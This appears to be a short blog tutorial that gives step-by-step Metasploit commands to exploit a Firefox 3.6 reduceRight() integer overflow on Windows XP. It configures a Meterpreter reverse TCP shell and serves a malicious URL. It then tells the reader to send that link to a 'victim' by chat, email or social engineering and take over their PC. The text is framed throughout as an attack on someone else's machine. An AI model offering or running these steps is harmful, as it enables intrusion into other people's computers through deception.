Exploit Remote Windows PC using Mozilla Firefox Array.reduceRight () Integer Overflow

This module exploits a vulnerability found in Mozilla Firefox 3.6. When an array object is configured with a large length value, the reduceRight() method may cause an invalid index being used, allowing abitrary remote code execution. Please note that the exploit requires a longer amount of time (compare to a typical browser exploit) in order to gain control of the machine

Exploit Targets

Mozilla Firefox 3.6.16

Windows XP SP 2


Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/browser/mozilla_reduceright

Msf exploit (mozilla_reduceright)>set payload windows/meterpreter/reverse_tcp

Msf exploit (mozilla_reduceright)>set lhost (IP of Local Host)

Msf exploit (mozilla_reduceright)>set srvhost (This must be an address on the local machine)

Msf exploit (mozilla_reduceright)>set uripath mozillanews (The Url to use for this exploit)

Msf exploit (mozilla_reduceright)>exploit

Now an URL you should give to your victim

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID


Leave a Reply

Your email address will not be published. Required fields are marked *